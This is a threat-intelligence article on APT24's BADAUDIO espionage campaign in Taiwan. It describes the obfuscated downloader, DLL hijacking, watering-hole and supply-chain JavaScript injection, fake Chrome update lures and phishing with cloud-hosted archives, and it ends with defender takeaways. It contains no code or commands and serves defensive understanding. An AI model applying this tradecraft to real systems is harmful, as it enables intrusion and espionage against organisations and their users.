Inside APT24’s BADAUDIO Campaign: Three Years of Stealthy Espionage

Who APT24 Is Targeting and Why It Matters

APT24, also known as Pitty Tiger, is a China-nexus hacking group that has been active since at least 2008. Historically, it has targeted government, healthcare, construction and engineering, mining, telecom, and non-profit sectors in Taiwan and the U.S., with a clear focus on intellectual property theft and strategically valuable data. 

The BADAUDIO campaign continues that pattern, but with a more sophisticated operational playbook:

Focus on organizations in Taiwan, including those connected through shared third-party services

Long-term operations designed to stay hidden rather than cause splashy disruption

Use of multiple initial access vectors over time instead of a single attack method

What BADAUDIO Actually Does

BADAUDIO is not a noisy, all-in-one backdoor. It is a highly obfuscated, C++ first-stage downloader engineered for stealth, persistence, and flexibility. 

Key traits:

Obfuscation via control flow flattening

The code structure is intentionally scrambled, making it difficult for analysts and automated tools to understand the execution path.

First-stage downloader behavior

Collects basic system details (hostname, user, architecture).

Sends that data to a hard-coded command-and-control (C2) server, often embedded in a cookie.

Downloads, decrypts (AES), and executes the next-stage payload directly in memory.

Integration with other tooling

In at least one case, the second stage was a Cobalt Strike Beacon tied to an earlier APT24 operation via a unique watermark. 
Google Cloud

Execution via DLL hijacking

Typically deployed as a malicious DLL using DLL Search Order Hijacking (MITRE ATT&CK T1574.001), piggybacking on legitimate applications for execution.

Recent variants arrive inside encrypted archives that contain the BADAUDIO DLL plus helper VBS, BAT, and LNK files. 

The result: defenders looking only for obvious implants or noisy persistence mechanisms will miss this first-stage loader, even as it quietly sets up follow-on access and tooling.

How Initial Access Evolved: From Watering Holes to Supply Chain to Phishing

Google’s analysis shows that APT24 did not stick to one delivery route. Instead, they iterated through a series of increasingly targeted and scalable tactics from November 2022 through at least September 2025. 

Phase 1: Strategic Web Compromises (Watering Holes)

From late 2022 onward, APT24 compromised 20+ legitimate websites, injecting malicious JavaScript:

The script excluded macOS, iOS, and Android, focusing only on Windows visitors.

It used FingerprintJS to generate unique browser fingerprints and send them to attacker infrastructure.

Only selected visitors were then presented with a fake Google Chrome update pop-up prompting a BADAUDIO download.

This gave the operators both reach (through popular sites) and precision (targeting only interesting visitors).

Phase 2: Supply Chain Attack via a Marketing Firm

In July 2024, APT24 escalated to a supply chain compromise by breaching a regional digital marketing firm in Taiwan: 

The attackers injected malicious JavaScript into a widely used third-party JS library distributed by the firm.

That library was embedded across more than 1,000 domains, turning a single supplier compromise into broad downstream exposure.

The malicious script contacted a typosquatted CDN domain, fetched attacker-controlled JavaScript, fingerprinted the browser, and then served the same fake-update BADAUDIO payload. 

Initially, the malicious logic only targeted specific domains using conditional script loading. For about ten days in August 2025, those restrictions were temporarily lifted, meaning all 1,000+ domains using the script were at risk before the targeting filter was re-enabled. 

Phase 3: Targeted Phishing With Cloud-Hosted Archives

From August 2024 onward, APT24 added spear-phishing to the mix: 

Lures referenced an animal rescue organization, a benign and emotionally engaging theme designed to lower suspicion.

Emails contained links to encrypted archives hosted on Google Drive and Microsoft OneDrive.

Once extracted and executed, these archives deployed BADAUDIO via the DLL hijacking chain.

Phishing messages were equipped with tracking pixels to confirm open rates and refine targeting. 

The pattern is clear: strategic web compromises for reach, supply chain compromises for scale and trust, and spear-phishing for precision—all delivering the same core malware family.

Part of a Larger Pattern of China-Nexus Espionage

The BADAUDIO campaign is not an isolated event. The article ties it to a broader set of operations attributed to suspected China-linked actors, including a separate campaign dubbed “Autumn Dragon” targeting government and media entities across Laos, Cambodia, Singapore, the Philippines, and Indonesia.

That operation:

Used spear-phishing with RAR archives exploiting a WinRAR vulnerability (CVE-2025-8088).

Employed DLL side-loading using legitimate executables (e.g., obs-browser-page.exe with a malicious libcef.dll).

Leveraged Telegram for C2 and further staged a lightweight C++ implant via additional side-loading.

Hid later-stage infrastructure behind Cloudflare with geo restrictions and user agent checks to limit visibility. 

The overlap is in tradecraft: DLL side-loading, living off legitimate services, layered staging, and tight geo-scoping.

Strategic Takeaways for Defenders

The BADAUDIO story is less about a single malware family and more about how modern state-backed operators operate over years:

Multi-vector access is the norm. Expect campaigns to use watering holes, supply chain injections, and targeted phishing in parallel.

Third-party JavaScript and CDNs are now high-value targets. A single marketing or analytics script can quietly compromise hundreds or thousands of domains.

First-stage loaders are engineered for invisibility. Obfuscation, in-memory execution, and DLL hijacking ensure that by the time conventional controls notice anything, the operation is already well established.

Legitimate cloud services are part of the attack surface. Google Drive, OneDrive, and other trusted platforms are central to both delivery and command-and-control, complicating simple “block by domain” strategies.

This campaign underlines a simple reality: long-term, state-backed espionage no longer hinges on a single vulnerability or obvious piece of malware. It rides on a combination of trusted relationships, third-party code, cloud services, and stealthy loaders that quietly reshape the risk surface for any organization connected to those supply chains.